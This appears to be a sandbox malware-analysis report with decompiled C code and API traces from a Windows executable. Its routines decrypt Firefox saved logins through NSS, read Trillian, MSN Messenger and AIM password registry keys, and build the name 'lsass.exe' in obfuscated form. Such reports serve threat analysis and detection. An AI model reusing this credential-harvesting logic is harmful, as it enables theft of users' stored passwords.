                                  • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                • LocalFree.KERNEL32(0040DCC1,75D6F420,?,?,?,75D6F420,00000000), ref: 00410500
                                • RegCloseKey.KERNELBASE(?,?,75D6F420,00000000,?,0040DCC1,?), ref: 00410512
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                • API String ID: 2768085393-1693574875
                                • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E004064FB(void* __eax, intOrPtr _a4, char* _a8) {
                                				signed int _v8;
                                				intOrPtr _v12;
                                				void _v275;
                                				char _v276;
                                				void _v539;
                                				char _v540;
                                				void _v803;
                                				char _v804;
                                				void _v1067;
                                				char _v1068;
                                				void* __ebx;
                                				void* __edi;
                                				signed int _t53;
                                				signed int _t54;
                                				int _t61;
                                				int _t64;
                                				int _t67;
                                				void* _t71;
                                				void* _t73;
                                				void* _t75;
                                				intOrPtr* _t76;
                                				intOrPtr _t115;
                                
                                				_v8 = _v8 & 0x00000000;
                                				_t115 = _a4 + 4;
                                				_v12 = _t115;
                                				0x410c4c(); // executed
                                				if(__eax != 0) {
                                					_v1068 = 0;
                                					memset( &_v1067, 0, 0x104);
                                					E00406958(0x104,  &_v1068, _a8);
                                					_t53 =  *(_t115 + 4);
                                					if(_t53 == 0) {
                                						_t54 = _t53 | 0xffffffff;
                                						__eflags = _t54;
                                					} else {
                                						_t54 =  *_t53( &_v1068);
                                					}
                                					if(_t54 == 0) {
                                						_v276 = 0;
                                						memset( &_v275, 0, 0x104);
                                						_v804 = 0;
                                						memset( &_v803, 0, 0x104);
                                						_v540 = 0;
                                						memset( &_v539, 0, 0x104);
                                						_t61 = strlen(_a8);
                                						_t19 = strlen(0x4181fc) + 1; // 0x1
                                						if(_t61 + _t19 >= 0x104) {
                                							_v276 = 0;
                                						} else {
                                							E00406B4B( &_v276, _a8, 0x4181fc);
                                						}
                                						_t64 = strlen(_a8);
                                						_t25 = strlen(0x418208) + 1; // 0x1
                                						if(_t64 + _t25 >= 0x104) {
                                							_v804 = 0;
                                						} else {
                                							E00406B4B( &_v804, _a8, 0x418208);
                                						}
                                						_t67 = strlen(_a8);
                                						_t31 = strlen(0x418218) + 1; // 0x1
                                						if(_t67 + _t31 >= 0x104) {
                                							_v540 = 0;
                                						} else {
                                							E00406B4B( &_v540, _a8, 0x418218);
                                						}
                                						_t71 = E004069D3( &_v276);
                                						_t131 = _t71;
                                						if(_t71 != 0) {
                                							E004062DB(_t131, _a4,  &_v276);
                                						}
                                						_t73 = E004069D3( &_v804);
                                						_t132 = _t73;
                                						if(_t73 != 0) {
                                							E004062DB(_t132, _a4,  &_v804);
                                						}
                                						_t75 = E004069D3( &_v540);
                                						_t133 = _t75;
                                						if(_t75 != 0) {
                                							E004062DB(_t133, _a4,  &_v540);
                                						}
                                						_t76 =  *((intOrPtr*)(_v12 + 8));
                                						_v8 = 1;
                                						if(_t76 != 0) {
                                							 *_t76();
                                						}
                                					}
                                					0x410d6f();
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                  • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                  • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                  • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                  • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                  • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                  • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                • memset.MSVCRT ref: 00406537
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • memset.MSVCRT ref: 0040657E
                                • memset.MSVCRT ref: 00406596
                                • memset.MSVCRT ref: 004065AE
                                • strlen.MSVCRT ref: 004065B9
                                • strlen.MSVCRT ref: 004065C7
                                • strlen.MSVCRT ref: 004065F2
                                • strlen.MSVCRT ref: 00406600
                                • strlen.MSVCRT ref: 0040662B
                                • strlen.MSVCRT ref: 00406639
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                  • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                  • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                  • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                  • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                  • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                • String ID: signons.txt$signons2.txt$signons3.txt
                                • API String ID: 4081699353-561706229
                                • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 60%
                                			E0040D3A0(char* _a4) {
                                				void _v267;
                                				char _v268;
                                				void _v531;
                                				char _v532;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				void* _t20;
                                				int _t24;
                                				char _t28;
                                				void* _t39;
                                				char* _t56;
                                				char* _t60;
                                				char* _t62;
                                				char* _t63;
                                				void* _t64;
                                
                                				_t56 = _a4;
                                				 *_t56 = 0;
                                				_v268 = 0;
                                				_t20 = memset( &_v267, 0, 0x104);
                                				_t60 =  &_v268;
                                				0x411dae(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian", "UninstallString", 0x104); // executed
                                				if(_t20 != 0) {
                                					_t39 = E00407139(0, "trillian.exe");
                                					if(_t39 > 0) {
                                						 *((char*)(_t64 + _t39 - 0x109)) = 0;
                                						if(E004069D3(_t60) != 0) {
                                							0x413d0c(_t56, _t60);
                                						}
                                					}
                                				}
                                				if( *_t56 == 0) {
                                					_v268 = 0;
                                					0x41212c(); // executed
                                					_t63 =  &_v268;
                                					E0040680E(_t63);
                                					E00406958(0x104, _t63, "trillian");
                                					if(E004069D3(_t63) != 0) {
                                						0x413d0c(_a4, _t63);
                                					}
                                				}
                                				_v532 = 0;
                                				memset( &_v531, 0, 0x104);
                                				0x41223f(0x1a); // executed
                                				_t62 = _a4 + 0x105;
                                				_t24 = strlen("Trillian\users\global");
                                				_t17 = strlen( &_v532) + 1; // 0x1
                                				if(_t24 + _t17 >= 0x104) {
                                					 *_t62 = 0;
                                				} else {
                                					E00406B4B(_t62,  &_v532, "Trillian\users\global");
                                				}
                                				_t28 = E004069D3(_t62);
                                				if(_t28 == 0) {
                                					 *_t62 = _t28;
                                					return _t28;
                                				}
                                				return _t28;
                                			}

                                APIs
                                • memset.MSVCRT ref: 0040D3C8
                                  • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
                                • _mbscpy.MSVCRT ref: 0040D41B
                                • _mbscpy.MSVCRT ref: 0040D464
                                • memset.MSVCRT ref: 0040D47C
                                • strlen.MSVCRT ref: 0040D49D
                                • strlen.MSVCRT ref: 0040D4AB
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                  • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                • API String ID: 2174551368-3003071570
                                • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                • String ID:
                                • API String ID: 3662548030-0
                                • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E0040DA79(intOrPtr* _a4) {
                                				void* _v12;
                                				int _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				int _v32;
                                				int _v36;
                                				int _v40;
                                				intOrPtr _v48;
                                				char _v52;
                                				int _v56;
                                				int _v60;
                                				char _v64;
                                				intOrPtr _v76;
                                				int _v84;
                                				int _v88;
                                				int _v344;
                                				int _v600;
                                				char _v856;
                                				char _v1112;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				char* _t73;
                                				long _t75;
                                				void** _t76;
                                				long _t78;
                                				long _t80;
                                				char* _t81;
                                				long _t83;
                                				char* _t84;
                                				int _t96;
                                				int _t115;
                                				int* _t132;
                                				int* _t134;
                                				int* _t136;
                                
                                				_t115 = 0;
                                				_v20 = 1;
                                				_v76 = 0x418ad8;
                                				_v64 = 0;
                                				_v56 = 0;
                                				_v60 = 0;
                                				0x40fd01();
                                				_v16 = 0;
                                				do {
                                					if(_v16 != _t115) {
                                						if(_v16 != 1) {
                                							_t73 =  &_v1112;
                                							0x40ff88(_t73); // executed
                                						} else {
                                							_t75 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                							if(_t75 != 0) {
                                								goto L5;
                                							} else {
                                								_t76 =  &_v12;
                                								goto L4;
                                							}
                                						}
                                					} else {
                                						_t78 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MSNMessenger", _t115, 0x20019,  &_v24); // executed
                                						if(_t78 != 0) {
                                							L5:
                                							_t73 = 0;
                                						} else {
                                							_t76 =  &_v24;
                                							L4:
                                							_t73 =  &_v1112;
                                							0x40fe5d(_t73, _t76);
                                						}
                                					}
                                					if(_t73 != _t115) {
                                						_v600 = _t115;
                                						_v344 = _t115;
                                						_v88 = _t115;
                                						_v84 = _t115;
                                						E00406958(0xff,  &_v344,  &_v856);
                                						_t132 =  &_v600;
                                						E00406958(0xff, _t132,  &_v1112);
                                						_v84 = 1;
                                						_v88 = 1;
                                						 *((intOrPtr*)( *_a4))(_t132);
                                						_t115 = 0;
                                					}
                                					_v16 = _v16 + 1;
                                				} while (_v16 < 3);
                                				_t80 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                				if(_t80 != 0) {
                                					_t81 = 0;
                                				} else {
                                					_t81 =  &_v1112;
                                					0x40fd2e("UserMicrosoft RTC Instant Messaging", "PasswordMicrosoft RTC Instant Messaging", _t81,  &_v12);
                                				}
                                				if(_t81 != _t115) {
                                					_v600 = _t115;
                                					_v344 = _t115;
                                					_v88 = _t115;
                                					_v84 = _t115;
                                					E00406958(0xff,  &_v344,  &_v856);
                                					_t136 =  &_v600;
                                					E00406958(0xff, _t136,  &_v1112);
                                					_v84 = 9;
                                					_v88 = 0xa;
                                					_v20 =  *((intOrPtr*)( *_a4))(_t136);
                                					_t115 = 0;
                                				}
                                				_t83 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
                                				if(_t83 != 0) {
                                					_t84 = 0;
                                				} else {
                                					_t84 =  &_v1112;
                                					0x40fd2e("UserMicrosoft Exchange Instant Messaging", "PasswordMicrosoft Exchange Instant Messaging", _t84,  &_v12);
                                				}
                                				if(_t84 != _t115) {
                                					_v600 = _t115;
                                					_v344 = _t115;
                                					_v88 = _t115;
                                					_v84 = _t115;
                                					E00406958(0xff,  &_v344,  &_v856);
                                					_t134 =  &_v600;
                                					E00406958(0xff, _t134,  &_v1112);
                                					_t96 = 0xa;
                                					_v84 = _t96;
                                					_v88 = _t96;
                                					_v20 =  *((intOrPtr*)( *_a4))(_t134);
                                					_t115 = 0;
                                				}
                                				_v28 = _a4;
                                				_v40 = _t115;
                                				_v32 = _t115;
                                				_v36 = _t115;
                                				_v52 = 0x418ae0;
                                				0x4103f1( &_v52); // executed
                                				0x410205( &_v52);
                                				if(_v48 == _t115) {
                                					0x410383( &_v52); // executed
                                				}
                                				E00404CE0( &_v40);
                                				E00404CE0( &_v64);
                                				return _v20;
                                			}








































                                APIs
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                  • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                  • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                  • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                Strings
                                • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Open$ByteCharMultiWidememset$FreeLocal
                                • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                • API String ID: 3472595403-3472580514
                                • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E0040BBF0(void* __eax, intOrPtr _a4) {
                                				void _v267;
                                				char _v268;
                                				char _v531;
                                				char _v792;
                                				intOrPtr _v796;
                                				char _v800;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				char* _t31;
                                				WINDOWPLACEMENT* _t43;
                                				void* _t45;
                                				char* _t49;
                                				struct HWND__* _t50;
                                				intOrPtr _t52;
                                				int _t56;
                                
                                				_t45 = __eax;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				GetModuleFileNameA(0,  &_v268, 0x104);
                                				_t31 = strrchr( &_v268, 0x2e);
                                				if(_t31 != 0) {
                                					 *_t31 = 0;
                                				}
                                				0x413cf4( &_v268, ".cfg");
                                				_v796 = _a4;
                                				_v800 = 0x419084;
                                				_v792 = 0;
                                				_v531 = 0;
                                				0x413d0c( &_v792,  &_v268);
                                				0x413d0c( &_v531, "General");
                                				E004039A8( *((intOrPtr*)(_t45 + 0x38c)),  &_v800); // executed
                                				_t52 = _v796;
                                				_t56 = 0x2c;
                                				if(_t52 != 0) {
                                					_t50 =  *(_t45 + 0x108);
                                					if(_t50 != 0) {
                                						_t43 = _t45 + 0x144;
                                						_t43->length = _t56;
                                						GetWindowPlacement(_t50, _t43);
                                					}
                                				}
                                				_t49 =  &_v800;
                                				 *((intOrPtr*)(_v800 + 0xc))("WinPos", _t45 + 0x144, _t56);
                                				if(_t52 == 0) {
                                					E00402D81(_t45);
                                				}
                                				return E0040946F( *((intOrPtr*)(_t45 + 0x390)), _t49,  &_v800);
                                			}




















                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                • String ID: .cfg$General$WinPos
                                • API String ID: 1012775001-3165880290
                                • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                • memset.MSVCRT ref: 0040265A
                                • memset.MSVCRT ref: 00402676
                                • wcscpy.MSVCRT ref: 004026BD
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                • RegCloseKey.ADVAPI32(?), ref: 00402724
                                Strings
                                • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$CloseEnumOpenValuewcscpy
                                • String ID: Software\America Online\AIM6\Passwords
                                • API String ID: 295685061-818317896
                                • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E004039A8(void* __edi, intOrPtr* __esi) {
                                				void _v259;
                                				char _v260;
                                				char _v2088;
                                				void* _t40;
                                				void* _t44;
                                				void* _t47;
                                				intOrPtr* _t68;
                                				void* _t69;
                                				void* _t70;
                                
                                				_t68 = __esi;
                                				_t70 = _t69 - 0x824;
                                				_t47 = 0;
                                				_push(0);
                                				_push(__edi + 0x728);
                                				_push("ShowGridLines");
                                				 *((intOrPtr*)( *__esi + 4))();
                                				_push(0);
                                				_push(__edi + 0x72c);
                                				_push("SaveFilterIndex");
                                				 *((intOrPtr*)( *__esi + 8))();
                                				_push(0);
                                				_push(__edi + 0x730);
                                				_push("AddExportHeaderLine");
                                				 *((intOrPtr*)( *__esi + 4))();
                                				_push(0);
                                				_push(__edi + 0x734);
                                				_push("MarkOddEvenRows");
                                				 *((intOrPtr*)( *__esi + 4))();
                                				E0040D725(E0040D339( &_v2088), 0);
                                				do {
                                					_v260 = 0;
                                					memset( &_v259, 0, 0xfe);
                                					_push(_t47);
                                					sprintf( &_v260, "Folder%d");
                                					_t70 = _t70 + 0x18;
                                					if( *((intOrPtr*)(_t68 + 4)) == 0) {
                                						L4:
                                						_t40 =  *((intOrPtr*)( *_t68 + 0x10))( &_v260, E0040D362(_t47), E0040D362(_t47), 0x104);
                                					} else {
                                						_t44 = E0040D362(_t47);
                                						0x413dce(_t44, E0040D362(_t47));
                                						if(_t44 != 0) {
                                							goto L4;
                                						} else {
                                							_t40 =  *((intOrPtr*)( *_t68 + 0x1c))( &_v260);
                                						}
                                					}
                                					_t47 = _t47 + 1;
                                				} while (_t47 < 7);
                                				return _t40;
                                			}













                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpimemsetsprintf
                                • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                • API String ID: 1148023869-3238971583
                                • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                • memset.MSVCRT ref: 0040FA77
                                • strlen.MSVCRT ref: 0040FA8E
                                • strlen.MSVCRT ref: 0040FA97
                                • strlen.MSVCRT ref: 0040FAF0
                                • strlen.MSVCRT ref: 0040FAFE
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscatmemset$_mbscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 29466866-467022611
                                • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
                                • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 43%
                                			E004043E4() {
                                				char _v11;
                                				char _v12;
                                				char _v13;
                                				char _v14;
                                				char _v15;
                                				char _v16;
                                				char _v17;
                                				char _v18;
                                				char _v19;
                                				char _v20;
                                				void _v283;
                                				char _v284;
                                				void _v556;
                                				void* __edi;
                                				void* __esi;
                                				void _t33;
                                				char* _t42;
                                				char _t48;
                                				intOrPtr _t50;
                                				intOrPtr _t51;
                                
                                				_v284 = 0;
                                				memset( &_v283, 0, 0x104);
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t48 =  *0x41e568; // 0x43
                                				asm("stosb");
                                				if(_t48 == 0) {
                                					 *0x41e670 = GetSystemDirectoryA(0x41e568, 0x104);
                                				}
                                				0x413d0c( &_v284, 0x41e568);
                                				E0040680E( &_v284);
                                				if(E004028E7() == 0) {
                                					_v11 = 0;
                                					_v18 = 0x61;
                                					_v15 = 0x2e;
                                					_v14 = 0x65;
                                					_v16 = 0x73;
                                					_v12 = 0x65;
                                					_v20 = 0x6c;
                                					_v17 = 0x73;
                                					_v19 = 0x73;
                                					_v13 = 0x78;
                                				}
                                				_t17 =  &_v20; // 0x6c
                                				_t42 =  &_v284;
                                				E00406EFE(_t42, _t17);
                                				0x411147();
                                				 *0x41e010 = 0; // executed
                                				0x411560(_t42);
                                				_t50 =  *0x41e010; // 0x0
                                				if(_t50 == 0) {
                                					L7:
                                					return 0;
                                				}
                                				memcpy( &_v556, 0x41df00, 0x10c);
                                				_t51 =  *0x41e010; // 0x0
                                				if(_t51 == 0) {
                                					goto L7;
                                				}
                                				_t33 = _v556;
                                				if(_t33 == 0) {
                                					goto L7;
                                				}
                                				return _t33;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: DirectorySystem_mbscpymemcpymemset
                                • String ID: C:\Windows\system32$lsass.exe
                                • API String ID: 3651535325-911417967
                                • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
                                • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
                                • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040FC6B
                                • memset.MSVCRT ref: 0040FC82
